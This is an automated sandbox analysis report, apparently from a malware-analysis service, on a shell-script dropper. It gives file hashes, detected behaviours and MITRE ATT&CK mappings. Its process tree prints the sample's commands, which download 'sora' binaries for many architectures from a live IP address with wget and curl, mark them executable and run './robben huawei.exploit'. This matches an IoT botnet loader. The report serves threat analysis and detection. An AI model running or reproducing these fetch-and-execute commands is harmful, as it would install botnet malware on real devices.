Analysis
max time kernel: 12s
max time network: 13s
platform: debian-9_armhf
resource: debian9-armhf-20240418-en
resource tags: arch:armhf, image:debian9-armhf-20240418-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 18/10/2024, 02:36
Static task: static1
Behavioral task: behavioral1
  Sample: bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh
  Resource: ubuntu1804-amd64-20240508-en
Behavioral task: behavioral2
  Sample: bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh
  Resource: debian9-armhf-20240418-en
Behavioral task: behavioral3
  Sample: bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh
  Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
  Sample: bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh
  Resource: debian9-mipsel-20240418-en
General
Target: bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh
Size: 2KB
MD5: 8fcfb30b099ea7ed97a91208fa96c1b4
SHA1: c16ecb9186d8468336f7c654d5b214eb9300d87e
SHA256: bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300
SHA512: 7df9e9bd9cb248605ec8defd1082b4ae474ad7d8b2170d213bdd82819156b4b8003149472e8099d62dd2685a038514da672bbe9ac0e60842286ae644ee7014c6
Malware Config
Signatures
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
688  chmod
696  chmod
778  chmod
801  chmod
832  chmod
838  chmod
727  chmod
676  chmod
702  chmod
740  chmod
768  chmod
820  chmod
826  chmod
753  chmod
Executes dropped EXE 14 IoCs
ioc          pid  Process
/tmp/robben  678  robben
/tmp/robben  690  robben
/tmp/robben  697  robben
/tmp/robben  703  robben
/tmp/robben  729  robben
/tmp/robben  742  robben
/tmp/robben  755  robben
/tmp/robben  769  robben
/tmp/robben  779  robben
/tmp/robben  803  robben
/tmp/robben  821  robben
/tmp/robben  827  robben
/tmp/robben  833  robben
/tmp/robben  839  robben
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information which indicates whether the system is a virtual machine.
description              ioc            Process
File opened for reading  /proc/cpuinfo  curl   (14 occurrences)
Reads runtime system information
description              ioc                             Process
File opened for reading  /proc/sys/crypto/fips_enabled  curl   (14 occurrences)
File opened for reading  /proc/self/auxv                curl   (14 occurrences)
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid  Process
680  wget
683  curl
687  cat
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description                    ioc          Process
File opened for modification  /tmp/robben  bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh
Processes
(PID, image, command line; child processes are indented under their parent, triggered signatures listed beneath each process)

652  /tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh  /tmp/bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh
     - Writes file to tmp directory
  654  /usr/bin/wget  wget http://93.123.85.141/bins/sora.x86
  662  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.x86
       - Checks CPU configuration
       - Reads runtime system information
  672  /bin/cat  cat sora.x86
  676  /bin/chmod  chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ
       - File and Directory Permissions Modification
  678  /tmp/robben  ./robben huawei.exploit
       - Executes dropped EXE
  680  /usr/bin/wget  wget http://93.123.85.141/bins/sora.mips
       - System Network Configuration Discovery
  683  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.mips
       - Checks CPU configuration
       - Reads runtime system information
       - System Network Configuration Discovery
  687  /bin/cat  cat sora.mips
       - System Network Configuration Discovery
  688  /bin/chmod  chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ
       - File and Directory Permissions Modification
  690  /tmp/robben  ./robben huawei.exploit
       - Executes dropped EXE
  692  /usr/bin/wget  wget http://93.123.85.141/bins/sora.x86_64
  694  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.x86_64
       - Checks CPU configuration
       - Reads runtime system information
  695  /bin/cat  cat sora.x86_64
  696  /bin/chmod  chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ
       - File and Directory Permissions Modification
  697  /tmp/robben  ./robben huawei.exploit
       - Executes dropped EXE
  699  /usr/bin/wget  wget http://93.123.85.141/bins/sora.i468
  700  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.i468
       - Checks CPU configuration
       - Reads runtime system information
  701  /bin/cat  cat sora.i468
  702  /bin/chmod  chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ
       - File and Directory Permissions Modification
  703  /tmp/robben  ./robben huawei.exploit
       - Executes dropped EXE
  705  /usr/bin/wget  wget http://93.123.85.141/bins/sora.i686
  706  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.i686
       - Checks CPU configuration
       - Reads runtime system information
  725  /bin/cat  cat sora.i686
  727  /bin/chmod  chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ
       - File and Directory Permissions Modification
  729  /tmp/robben  ./robben huawei.exploit
       - Executes dropped EXE
  732  /usr/bin/wget  wget http://93.123.85.141/bins/sora.mpsl
  735  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.mpsl
       - Checks CPU configuration
       - Reads runtime system information
  739  /bin/cat  cat sora.mpsl
  740  /bin/chmod  chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ
       - File and Directory Permissions Modification
  742  /tmp/robben  ./robben huawei.exploit
       - Executes dropped EXE
  744  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm4
  747  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm4
       - Checks CPU configuration
       - Reads runtime system information
  752  /bin/cat  cat sora.arm4
  753  /bin/chmod  chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ
       - File and Directory Permissions Modification
  755  /tmp/robben  ./robben huawei.exploit
       - Executes dropped EXE
  758  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm5
  763  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm5
       - Checks CPU configuration
       - Reads runtime system information
  766  /bin/cat  cat sora.arm5
  768  /bin/chmod  chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ
       - File and Directory Permissions Modification
  769  /tmp/robben  ./robben huawei.exploit
       - Executes dropped EXE
  773  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm6
  775  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm6
       - Checks CPU configuration
       - Reads runtime system information
  777  /bin/cat  cat sora.arm6
  778  /bin/chmod  chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ
       - File and Directory Permissions Modification
  779  /tmp/robben  ./robben huawei.exploit
       - Executes dropped EXE
  781  /usr/bin/wget  wget http://93.123.85.141/bins/sora.arm7
  796  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.arm7
       - Checks CPU configuration
       - Reads runtime system information
  799  /bin/cat  cat sora.arm7
  801  /bin/chmod  chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ
       - File and Directory Permissions Modification
  803  /tmp/robben  ./robben huawei.exploit
       - Executes dropped EXE
  805  /usr/bin/wget  wget http://93.123.85.141/bins/sora.ppc
  808  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.ppc
       - Checks CPU configuration
       - Reads runtime system information
  819  /bin/cat  cat sora.ppc
  820  /bin/chmod  chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ
       - File and Directory Permissions Modification
  821  /tmp/robben  ./robben huawei.exploit
       - Executes dropped EXE
  823  /usr/bin/wget  wget http://93.123.85.141/bins/sora.ppc440fp
  824  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.ppc440fp
       - Checks CPU configuration
       - Reads runtime system information
  825  /bin/cat  cat sora.ppc440fp
  826  /bin/chmod  chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ
       - File and Directory Permissions Modification
  827  /tmp/robben  ./robben huawei.exploit
       - Executes dropped EXE
  829  /usr/bin/wget  wget http://93.123.85.141/bins/sora.m68k
  830  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.m68k
       - Checks CPU configuration
       - Reads runtime system information
  831  /bin/cat  cat sora.m68k
  832  /bin/chmod  chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ
       - File and Directory Permissions Modification
  833  /tmp/robben  ./robben huawei.exploit
       - Executes dropped EXE
  835  /usr/bin/wget  wget http://93.123.85.141/bins/sora.sh4
  836  /usr/bin/curl  curl -O http://93.123.85.141/bins/sora.sh4
       - Checks CPU configuration
       - Reads runtime system information
  837  /bin/cat  cat sora.sh4
  838  /bin/chmod  chmod +x bc48383983fbe820e527ea931c655dd220fd7c2978e2cd746c72aeb0d739a300.sh robben systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-pKCtoQ
       - File and Directory Permissions Modification
  839  /tmp/robben  ./robben huawei.exploit
       - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
  File and Directory Permissions Modification (1)
    Linux and Mac File and Directory Permissions Modification (1)
  Virtualization/Sandbox Evasion (1)
    System Checks (1)